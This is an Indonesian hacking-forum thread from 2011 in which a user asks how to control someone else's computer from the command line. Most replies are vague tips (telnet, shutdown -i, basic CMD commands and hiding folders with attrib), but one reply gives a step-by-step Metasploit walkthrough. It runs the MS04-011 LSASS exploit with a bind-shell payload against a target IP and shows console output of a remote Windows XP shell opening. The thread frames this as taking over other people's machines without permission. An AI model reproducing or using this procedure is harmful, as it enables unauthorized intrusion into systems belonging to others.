Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

bagai mana caranya menggerakan komputer orang melalui CMD

[ Facebook comments]

Forum untuk membahas hacking secara umum

Moderators: Paman, Xshadow, indounderground

bagai mana caranya menggerakan komputer orang melalui CMD

Postby ch0c0 pahmen » Wed Mar 02, 2011 3:38 pm

saya pernah lihat teman saya, dia menggerakan komputernya memakai komputer orang laen
dia bisa menguasain sistem dengan bebas
saya hanya dapat melihat dia hanya menggunakan Common saja
dari situ lah saya ingin belajar unutk menjadi hacking

saya mohon respon dari para sesepu dan para newbie yang tahu cara eksekusinya.....
terimakasih
ch0c0 pahmen
 
Posts: 2
Joined: Sat Feb 26, 2011 1:28 pm
Location: Medan

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby chevssites » Wed Mar 02, 2011 5:12 pm

mungkin coba pake
perintah seperti telnet
atoo shutdown -i
chevssites
 
Posts: 9
Joined: Tue Mar 02, 2010 1:10 pm

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby badwolves1986 » Thu Mar 03, 2011 12:46 am

klo pake CMD ane kurang ngerti bang
tapi klo metasploit ngarti wkwk :D
badwolves1986
 
Posts: 99
Joined: Mon Nov 15, 2010 10:23 am

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby nakmedan » Fri Mar 18, 2011 12:41 pm

kalo pke metasploit gmana tuh om....tolong pencerahaannya dong
nakmedan
 
Posts: 15
Joined: Thu Nov 18, 2010 2:46 pm

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby Darkzzzz » Tue Mar 22, 2011 5:03 pm

Menggerakan Komputer?
Maksudnya apa ya?
Meremote?
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby j0ck3r » Tue Mar 22, 2011 6:27 pm

ch0c0 pahmen wrote:saya pernah lihat teman saya, dia menggerakan komputernya memakai komputer orang laen
dia bisa menguasain sistem dengan bebas
saya hanya dapat melihat dia hanya menggunakan Common saja
dari situ lah saya ingin belajar unutk menjadi hacking

saya mohon respon dari para sesepu dan para newbie yang tahu cara eksekusinya.....
terimakasih

apa mungkin dia mengakses telnet,setelah dia tahu password adminnya??
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me
User avatar
j0ck3r
 
Posts: 330
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby kautzar » Thu Mar 24, 2011 10:00 am

mungkin untuk pemula yang dasar2 dulu..monggo dicoba..comand prompt sederhana
net view : untuk melihat user yg aktif di jaringan
dir : melihat folder
ipcofig : melihat ip dll
trasert : melihat jalur jaringan
attrib :display or change file attribute

salah satu rumus untk menghiden file : ketik tempat partisi yg akan di hidden..
1 misal data berada di D.. ketik D: enter---
2 terus ketik cd spasi folder yang akan di hidden
3 kalau sukses akan muncul D:/Folder yang akan di hidden>
4 setelah itu ketik Attrib spasi +s spasi +h spasi /s spasi /d
5 folder akan hilang otomatis
kautzar
 
Posts: 2
Joined: Tue Mar 22, 2011 3:25 pm

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby j0ck3r » Thu Mar 24, 2011 2:27 pm

nakmedan wrote:kalo pke metasploit gmana tuh om....tolong pencerahaannya dong

cuman contoh lama,maaf kalau salah,silahkan gunakan metasploit versi terbaru :maaf: :maaf:
1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada
msf > show exploits

5. load modul exploit,kita gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me
User avatar
j0ck3r
 
Posts: 330
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground

Re: bagai mana caranya menggerakan komputer orang melalui CM

Postby I_Free » Mon Dec 26, 2011 3:46 pm

To Bang Jocker:

Cara diatas berlaku ke IP static or IP Dynamic..?

Thanx... :)
I_Free
 
Posts: 1
Joined: Mon Dec 26, 2011 1:37 pm

leave a comment


Return to Hacking Umum

Who is online

Users browsing this forum: No registered users and 4 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id